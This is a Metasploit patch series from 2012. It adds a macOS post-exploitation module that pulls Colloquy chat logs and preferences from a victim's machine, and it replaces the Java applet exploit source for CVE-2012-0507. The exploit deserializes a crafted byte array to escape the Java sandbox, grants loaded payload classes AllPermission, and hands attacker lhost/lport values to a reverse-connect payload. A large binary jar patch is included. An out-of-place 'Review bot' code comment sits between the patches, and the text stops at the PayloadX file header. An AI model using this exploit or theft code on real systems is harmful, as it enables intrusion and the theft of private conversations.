From bec8d40a6c3100ec6c5a8e57cab901141670694e Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 29 Mar 2012 16:24:31 -0500 Subject: [PATCH 1/5] File permissions fix --- data/exploits/CVE-2012-0507.jar | Bin 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 data/exploits/CVE-2012-0507.jar diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar old mode 100644 new mode 100755 From 8d2a58dfd803e3e12decbcaec16c74b7d206bf42 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 29 Mar 2012 16:24:43 -0500 Subject: [PATCH 2/5] Add post module enum_colloquy.rb to collect chatlogs and the preferences list --- modules/post/osx/gather/enum_colloquy.rb | 168 +++++++++++++++++++++++ 1 file changed, 168 insertions(+) create mode 100644 modules/post/osx/gather/enum_colloquy.rb diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb new file mode 100644 index 0000000000..9394d9c221 --- /dev/null +++ b/modules/post/osx/gather/enum_colloquy.rb 
@@ -0,0 +1,168 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'OSX Gather Colloquy Enumeration',
+ 'Description' => %q{
+ This module will collect Colloquy's info plist file and chat logs from the
+ victim's machine. There are three actions you may choose: INFO, and CHATS, and
+ ALL. Please note that the CHAT action may time a long time depending on the
+ victim machine, therefore we suggest to set the regex 'PATTERN' option in order
+ to search for certain log names (which consists of the contact's name, and a
+ timestamp). The default 'PATTERN' is configured as "^alien" as an example
+ to search for any chatlogs associated with the name "alien".
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'sinn3r'],
+ 'Platform' => [ 'osx' ],
+ 'SessionTypes' => [ "shell" ],
+ 'Actions' =>
+ [
+ ['ACCOUNTS', { 'Description' => 'Collect the preferences plists' } ],
+ ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
+ ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]
+ ],
+ 'DefaultAction' => 'ALL'
+ ))
+
+ register_options(
+ [
+ OptRegexp.new('PATTERN', [true, 'Match a keyword in any chat log\'s filename', '^alien']),
+ ], self.class)
+ end
+
+ #
+ # Parse a plst file to XML format:
+ # http://hints.macworld.com/article.php?story=20050430105126392
+ #
+ def plutil(filename)
+ exec("plutil -convert xml1 #(unknown)")
+ data = exec("cat #(unknown)")
+ return data
+ end
+
+ def get_chatlogs(base)
+ chats = []
+
+ # Get all the logs
+ print_status("#{@peer} - Download logs...")
+ folders = dir("\"#{base}\"")
+ folders.each do |f|
+ # Get all the transcripts from this folder
+ trans = exec("find \"#{base}#{f}\" -name *.colloquyTranscript")
+ trans.split("\n").each do |t|
+ fname = ::File.basename(t)
+ # Check fname before downloading it
+ next if fname !~ datastore['PATTERN']
+ print_status("#{@peer} - Downloading #{t}")
+ content = exec("cat \"#{t}\"")
+ chats << {:log_name => fname, :content => content}
+ end
+ end
+
+ return chats
+ end
+
+ def get_preferences(path)
+ raw_plist = exec("cat #{path}")
+ return nil if raw_plist =~ /No such file or directory/
+
+ xml_plist = plutil(path)
+ return xml_plist
+ end
+
+ def save(type, data)
+ case type
+ when :preferences
+ p = store_loot(
+ 'colloquy.preferences',
+ 'text/plain',
+ session,
+ data,
+ "info.colloquy.plist"
+ )
+ print_good("#{@peer} - info.colloquy.plist saved as: #{p}")
+
+ when :chatlogs
+ data.each do |d|
+ log_name = d[:log_name]
+ content = d[:content]
+
+ p = store_loot(
+ 'colloquy.chatlogs',
+ 'text/plain',
+ session,
+ content,
+ log_name
+ )
+ print_good("#{@peer} - #{log_name} stored in #{p}")
+ end
+ end
+ end
+
+ def whoami
+ exec("/usr/bin/whoami")
+ end
+
+ def dir(path)
+ subdirs = exec("ls -l #{path}")
+ return [] if subdirs =~ /No such file or directory/
+ items = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d\:]+\x20(.+)$/).flatten
+ return items
+ end
+
+ def exec(cmd)
+ begin
+ out = cmd_exec(cmd).chomp
+ rescue ::Timeout::Error => e
+ vprint_error("#{@peer} - #{e.message} - retrying...")
+ retry
+ rescue EOFError => e
+ vprint_error("#{@peer} - #{e.message} - retrying...")
+ retry
+ end
+ end
+
+ def run
+ if action.nil?
+ print_error("Please specify an action")
+ return
+ end
+
+ @peer = "#{session.session_host}:#{session.session_port}"
+ user = whoami
+
+ transcripts_path = "/Users/#{user}/Documents/Colloquy Transcripts/"
+ prefs_path = "/Users/#{user}/Library/Preferences/info.colloquy.plist"
+
+ prefs = get_preferences(prefs_path) if action.name =~ /ALL|ACCOUNTS/i
+ chatlogs = get_chatlogs(transcripts_path) if action.name =~ /ALL|CHATS/i
+
+ save(:preferences, prefs) if not prefs.nil? and not prefs.empty?
+ save(:chatlogs, chatlogs) if not chatlogs.nil? and not chatlogs.empty?
+ end
+
+end
+
+=begin
+/Users/[user]/Documents/Colloquy Transcripts
+/Users/[user]/Library/Preferences/info.colloquy.plist
+
+Transcript example:
+/Users/[username]/Documents/Colloquy Transcripts//[server]/[contact] 10-13-11.colloquyTranscript
+=end
From e018c6604fcc6c965ecee6f9358b93ba8f12d51f Mon Sep 17 00:00:00 2001
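Review bot: `exec` retries without bound — both `rescue` arms end in a bare `retry` with no attempt counter, so if the session keeps timing out or the channel is gone (an `EOFError` usually means exactly that) the module spins forever instead of failing. Cap the attempts and re-raise once the cap is reached; the two arms do the same thing and can be merged into one `rescue ::Timeout::Error, EOFError => e`. Two smaller points in the same hunk: as rendered, `plutil` never uses its `filename` parameter (`exec("plutil -convert xml1 #(unknown)")` looks like a `#{filename}` interpolation lost in rendering — worth confirming against the committed file), and the description lists an `INFO` action while the `Actions` table only defines `ACCOUNTS` (the later wording fix in patch 5 keeps `INFO`).
```ruby
def exec(cmd, max_attempts = 3)
  attempts = 0
  begin
    cmd_exec(cmd).chomp
  rescue ::Timeout::Error, EOFError => e
    attempts += 1
    raise if attempts >= max_attempts
    vprint_error("#{@peer} - #{e.message} - retrying (#{attempts}/#{max_attempts})...")
    retry
  end
end
```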
From: sinn3r Date: Fri, 30 Mar 2012 02:06:56 -0500 Subject: [PATCH 3/5] Modify CVE-2012-0507 --- data/exploits/CVE-2012-0507.jar | Bin 6944 -> 6147 bytes .../exploits/CVE-2012-0507/Exploit.java | 58 ------ .../exploits/CVE-2012-0507/msf/x/Exploit.java | 53 +++++ .../CVE-2012-0507/{ => msf/x}/Help.java | 29 ++- .../CVE-2012-0507/msf/x/PayloadX.java | 193 ++++++++++++++++++ .../browser/java_atomicreferencearray.rb | 32 +-- 6 files changed, 275 insertions(+), 90 deletions(-) delete mode 100644 external/source/exploits/CVE-2012-0507/Exploit.java create mode 100644 external/source/exploits/CVE-2012-0507/msf/x/Exploit.java rename external/source/exploits/CVE-2012-0507/{ => msf/x}/Help.java (91%) create mode 100644 external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java 
diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar index e0c2d68188aa782f75ca6049153c5159bc8c61ad..8c0b4d6e5c73d1958a4310b5ddbce458b4eb8153 100755 GIT binary patch delta 5098 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 JG4-F_e*lLxf#?7L delta 5893 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 I4*I+MAKMM%4gdfE diff --git a/external/source/exploits/CVE-2012-0507/Exploit.java b/external/source/exploits/CVE-2012-0507/Exploit.java deleted file mode 100644 index 3a1f899b9e..0000000000 --- a/external/source/exploits/CVE-2012-0507/Exploit.java +++ /dev/null 
@@ -1,58 +0,0 @@ -package a; - -import java.applet.Applet; -import java.io.ByteArrayInputStream; -import java.io.ObjectInputStream; -import java.util.concurrent.atomic.AtomicReferenceArray; -import a.*; - -// Referenced classes of package a: -// Help - -public class Exploit extends Applet -{ - - public Exploit() - { - } - - public static byte[] StringToBytes(String s) - { - byte abyte0[] = new byte[s.length() / 2]; - for(int i = 0; i < s.length(); i += 2) - abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); - - return abyte0; - } - - public void init() - { - try - { - String as[] = { - "ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" - }; - StringBuilder stringbuilder = new StringBuilder(); - for(int i = 0; i < as.length; i++) - stringbuilder.append(as[i]); - - ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString()))); - Object aobj[] = (Object[])(Object[])objectinputstream.readObject(); - Help ahelp[] = (Help[])(Help[])aobj[0]; - AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1]; - ClassLoader classloader = getClass().getClassLoader(); - atomicreferencearray.set(0, classloader); - Help _tmp = ahelp[0]; - - String data = getParameter( "data" ); - String jar = getParameter( "jar" ); - String lhost = getParameter( "lhost" ); - String lport = getParameter( "lport" ); - System.out.println("go go go"); - Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) )); - } - catch(Exception exception) { - System.out.println(exception.getMessage()); - } - } -} 
diff --git a/external/source/exploits/CVE-2012-0507/msf/x/Exploit.java b/external/source/exploits/CVE-2012-0507/msf/x/Exploit.java new file mode 100644 index 0000000000..dec638d2a5 --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/msf/x/Exploit.java 
@@ -0,0 +1,53 @@ +package msf.x; + +import java.applet.Applet; +import java.io.ByteArrayInputStream; +import java.io.ObjectInputStream; +import java.util.concurrent.atomic.AtomicReferenceArray; + +public class Exploit extends Applet +{ + public Exploit() {} + + public void init() + { + try + { + byte[] buf = new byte[] { + -84,-19,0,5,117,114,0,19,91,76,106,97,118,97,46,108,97,110,103,46,79,98,106, + 101,99,116,59,-112,-50,88,-97,16,115,41,108,2,0,0,120,112,0,0,0,2,117,114,0, + 13,91,76,109,115,102,46,120,46,72,101,108,112,59,-2,44,-108,17,-120,-74,-27, + -1,2,0,0,120,112,0,0,0,1,112,115,114,0,48,106,97,118,97,46,117,116,105,108, + 46,99,111,110,99,117,114,114,101,110,116,46,97,116,111,109,105,99,46,65,116, + 111,109,105,99,82,101,102,101,114,101,110,99,101,65,114,114,97,121,-87,-46, + -34,-95,-66,101,96,12,2,0,1,91,0,5,97,114,114,97,121,116,0,19,91,76,106,97, + 118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,120,112,113,0,126,0,3 + }; + + ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(buf)); + Object aobj[] = (Object[])objectinputstream.readObject(); + Help ahelp[] = (Help[]) aobj[0]; + + AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray) aobj[1]; + ClassLoader classloader = getClass().getClassLoader(); + atomicreferencearray.set(0, classloader); + Help _tmp = ahelp[0]; + + String data = getParameter( "data" ); + String jar = getParameter( "jar" ); + String lhost = getParameter( "lhost" ); + String lport = getParameter( "lport" ); + + Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) )); + } + catch(Exception exception) { + //System.out.println(exception.getMessage()); + } + } +} + +/* +javac -d bin msf/x/*.java +cd bin +jar cvf ../CVE-2012-0507.jar msf/x/*.class +*/ \ No newline at end of file 
diff --git a/external/source/exploits/CVE-2012-0507/Help.java b/external/source/exploits/CVE-2012-0507/msf/x/Help.java similarity index 91% rename from external/source/exploits/CVE-2012-0507/Help.java rename to external/source/exploits/CVE-2012-0507/msf/x/Help.java index f340a77161..9ffcea8253 100644 --- a/external/source/exploits/CVE-2012-0507/Help.java +++ b/external/source/exploits/CVE-2012-0507/msf/x/Help.java @@ -1,4 +1,4 @@ -package a; +package msf.x; import java.io.ByteArrayOutputStream; import java.io.IOException; @@ -16,11 +16,11 @@ import java.lang.reflect.Field; public class Help extends ClassLoader implements Serializable{ public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) { - + String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" }; String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" }; Class cls = null; - + try { for( int index=0 ; index 0 ) bos.write( buffer, 0, length ); + // convert it to a simple byte array buffer = bos.toByteArray(); URL url = new URL( "file:///" ); - Certificate[] certs = new Certificate[0]; - Permissions perm = new Permissions(); perm.add( new AllPermission() ); - ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm ); - cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd ); - Class class_cls = cls.getClass(); - System.out.println("The type of the object is: " + class_cls.getName()); } - + // cls will end up being the PayloadX class if( cls != null ) { 
@@ -60,23 +56,22 @@ public class Help extends ClassLoader implements Serializable{ Field payload_jar = cls.getField( "jar" ); Field payload_lhost = cls.getField( "lhost" ); Field payload_lport = cls.getField( "lport" ); - + // instantiate the PayloadX object once so as we can set the native payload data Object obj = cls.newInstance(); - + // set the native payload data, lhost and lport payload_data.set( obj, data ); payload_jar.set( obj, jar ); payload_lhost.set( obj, lhost ); payload_lport.setInt( obj, lport ); - - // instantiate a second PayloadX object to perform the actual payload + + // instantiate a second PayloadX object to perform the actual payload obj = cls.newInstance(); } } catch( Exception e ) { - System.out.println(e.getMessage()); - } + //System.out.println(e.getMessage()); + } } } - diff --git a/external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java b/external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java new file mode 100644 index 0000000000..5ff0e27563 --- /dev/null +++ b/external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java 
